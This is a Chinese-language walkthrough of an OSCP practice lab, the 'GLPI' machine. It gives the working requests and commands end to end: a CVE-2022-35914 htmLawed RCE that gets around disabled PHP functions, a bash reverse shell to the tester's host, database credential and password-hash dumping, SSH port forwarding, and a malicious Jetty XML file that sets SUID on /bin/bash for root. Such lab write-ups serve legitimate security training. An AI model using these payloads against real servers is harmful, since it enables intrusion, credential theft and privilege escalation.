OSCP靶场--GLPI

OSCP靶场–GLPI

考点(CVE-2022-35914 php执行函数绕过+ssh端口转发+jetty xml RCE)

1.nmap扫描(ssh端口转发)

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.194.242 -sV -sC --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-26 22:22 EDT
Nmap scan report for 192.168.194.242
Host is up (0.37s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA)
|   256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA)
|_  256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Authentication - GLPI
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.45 seconds

2.user priv

## 目录扫描：
                                                                                                                                               
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.194.242
[22:26:05] 200 -   40KB - /CHANGELOG.md   

## 目录扫描，发现changelog，比对版本，发现版本号，查出公共exp，需要密码，密码弱密码尝试，默认密码尝试失败：
## google搜索发现未授权rce:
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/POC_2022-35914.sh
https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/

###
## exec无输出，查看phpinfo发现exec函数被禁用：
┌──(root㉿kali)-[~/Desktop]
└─# curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://192.168.194.242/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\&nbsp; \[[0-9]+\] =\&gt;'| sed -E 's/\&nbsp; \[[0-9]+\] =\&gt; (.*)<br \/>/\1/'

##
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1

Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1

sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=passthru&spec[0]=&spec[1]=cat+/etc/passwd


##
## 反弹shell:
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1

Host: 192.168.178.242
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Origin: http://192.168.178.242
Connection: close
Referer: http://192.168.178.242/vendor/htmlawed/htmlawed/htmLawedTest.php
Cookie: sid=f76i0i193fprhls32eoai9s1sf
Upgrade-Insecure-Requests: 1


sid=f76i0i193fprhls32eoai9s1sf&text=call_user_func&hhook=array_map&hexec=system&spec[0]=&spec[1]=bash -c 'bash -i >& /dev/tcp/192.168.45.171/80 0>&1'


####################
## 发现数据库凭据：
www-data@glpi:/var/www/glpi/config$ cat config_db.php
cat config_db.php
<?php
class DB extends DBmysql {
   public $dbhost = 'localhost';
   public $dbuser = 'glpi';
   public $dbpassword = 'glpi_db_password';
   public $dbdefault = 'glpi';
   public $use_utf8mb4 = true;
   public $allow_myisam = false;
   public $allow_datetime = false;
   public $allow_signed_keys = false;
}


####################
## 提升shell并且连接mysql:
┌──(root㉿kali)-[~/Desktop]
└─# sudo rlwrap -cAr nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.178.242] 40028
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ python3 -c 'import pty;pty.spawn("bash")'
<htmlawed$ python3 -c 'import pty;pty.spawn("bash")'  
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ 
zsh: suspended  sudo rlwrap -cAr nc -lvnp 80
                                                                                                                                              
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo; fg          
[1]  + continued  sudo rlwrap -cAr nc -lvnp 80
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ mysql -u glpi -p
mysql -u glpi -p
Enter password: glpi_db_password

Welcome to the MySQL monitor.  Commands end with ; or \g.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
mysql> select id,name,password from glpi_users;
select id,name,password from glpi_users;
+----+-------------+--------------------------------------------------------------+
| id | name        | password                                                     |
+----+-------------+--------------------------------------------------------------+
|  2 | glpi        | $2y$10$9DbdMovtCw0eI.FWm18SRu34ErQD6LUzA8AqGUqiEat0S/ahlyHFa |
|  3 | post-only   | $2y$10$dTMar1F3ef5X/H1IjX9gYOjQWBR1K4bERGf4/oTPxFtJE/c3vXILm |
|  4 | tech        | $2y$10$.xEgErizkp6Az0z.DHyoeOoenuh0RcsX4JapBk2JMD6VI17KtB1lO |
|  5 | normal      | $2y$10$Z6doq4zVHkSPZFbPeXTCluN1Q/r0ryZ3ZsSJncJqkN3.8cRiN0NV. |
|  6 | glpi-system |                                                              |
|  7 | betty       | $2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa |
+----+-------------+--------------------------------------------------------------+
6 rows in set (0.00 sec)

## cat /etc/passwd | grep -v nogloin发现betty用户：
## 破解betty的hash:$2y$10$jG8/feTYsguxsnBqRG6.judCDSNHY4it8SgBTAHig9pMkfmMl9CFa

## 破解失败：
┌──(root㉿kali)-[~/Desktop]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:57 0.33% (ETA: 2024-03-29 02:25) 0g/s 105.8p/s 105.8c/s 105.8C/s honda04..grethel

######################
## 查询mysql中含有某字段的所有表：
SELECT TABLE_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'your_column_name' AND TABLE_SCHEMA = 'your_database_name';

## 查询其他表数据：发现敏感信息：betty:SnowboardSkateboardRoller234
mysql> sselect * from glpi_itilfollowups;
select * from glpi_itilfollowups;
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
| id | itemtype | items_id | date                | users_id | users_id_editor | content                                                                                                                                                                                                                                                 | is_private | requesttypes_id | date_mod            | date_creation       | timeline_position | sourceitems_id | sourceof_items_id |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+
|  1 | Ticket   |        1 | 2022-10-08 20:57:14 |        2 |               0 | &#60;p&#62;Hello Betty,&#60;/p&#62;
&#60;p&#62;i changed your password to : SnowboardSkateboardRoller234&#60;/p&#62;
&#60;p&#62;Please change it again as soon as you can.&#60;/p&#62;
&#60;p&#62;regards.&#60;/p&#62;
&#60;p&#62;Lucas&#60;/p&#62; |          0 |               1 | 2022-10-08 20:57:14 | 2022-10-08 20:57:14 |                 4 |              0 |                 0 |
+----+----------+----------+---------------------+----------+-----------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+------------+-----------------+---------------------+---------------------+-------------------+----------------+-------------------+


##
www-data@glpi:/var/www/glpi/vendor/htmlawed/htmlawed$ su betty
su betty
Password: SnowboardSkateboardRoller234

$ id
id
uid=1000(betty) gid=1000(betty) groups=1000(betty)
$ whoami
whoami
betty
$ cat /home/betty/local.txt
cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0
$ 

注意事项：

3. root priv

## linpeas枚举：
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                                                                 
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                                                             
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -     

###########
## ssh本地端口转发：
ssh -L 1234:localhost:8080 betty@192.168.178.242 -N

##
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce

## 上传恶意xml反弹shell:
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------

##
<?xml version="1.0"?>
<!DOCTYPE Configure PUBLIC "-//Jetty//Configure//EN" "https://www.eclipse.org/jetty/configure_10_0.dtd">
<Configure class="org.eclipse.jetty.server.handler.ContextHandler">
    <Call class="java.lang.Runtime" name="getRuntime">
        <Call name="exec">
            <Arg>
                <Array type="String">
                    <Item>/tmp/root.sh</Item>
                </Array>
            </Arg>
        </Call>
    </Call>
</Configure>

###
betty@glpi:/opt/jetty/jetty-base$ echo "chmod +s /bin/bash" > /tmp/root.sh
echo "chmod +s /bin/bash" > /tmp/root.sh
betty@glpi:/opt/jetty/jetty-base$ chmod +x /tmp/root.sh

## 在jetty webroot目录下写入xml:
$ wget http://192.168.45.171/rooted.xml
--2024-03-27 11:02:54--  http://192.168.45.171/rooted.xml
Connecting to 192.168.45.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 464 [application/xml]
Saving to: ‘rooted.xml’

rooted.xml                         100%[=============================================================>]     464  --.-KB/s    in 0s      

2024-03-27 11:02:55 (27.4 MB/s) - ‘rooted.xml’ saved [464/464]

$ ls
rooted.xml  root.xml
$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
$ bash -p
bash-5.0# id
uid=1000(betty) gid=1000(betty) euid=0(root) egid=0(root) groups=0(root),1000(betty)

######
##
bash-5.0# cat /home/betty/local.txt
c5e4ea02ee30e1a0d71d76650440ceb0

bash-5.0# cat /root/proof.txt
1063fa4253b657156458c71f4a7847b7

4.总结：

## writeup:
https://medium.com/@ardian.danny/oscp-practice-series-17-proving-grounds-glpi-555ce2d9234e
https://r4j3sh.medium.com/glpi-pg-practice-writeup-853aff88151f

##
https://book.hacktricks.xyz/pentesting-web/file-upload#jetty-rce
https://github.com/Mike-n1/tips/blob/main/JettyShell.xml?source=post_page-----555ce2d9234e--------------------------------